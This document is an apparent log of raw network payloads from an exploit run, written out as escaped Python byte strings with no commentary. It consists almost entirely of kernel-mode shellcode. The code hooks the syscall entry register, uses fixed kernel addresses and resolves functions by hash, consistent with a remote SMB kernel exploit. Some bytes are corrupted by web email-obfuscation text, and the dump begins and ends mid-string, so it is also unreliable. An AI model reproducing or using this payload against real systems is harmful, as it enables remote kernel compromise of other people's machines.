\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 13, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\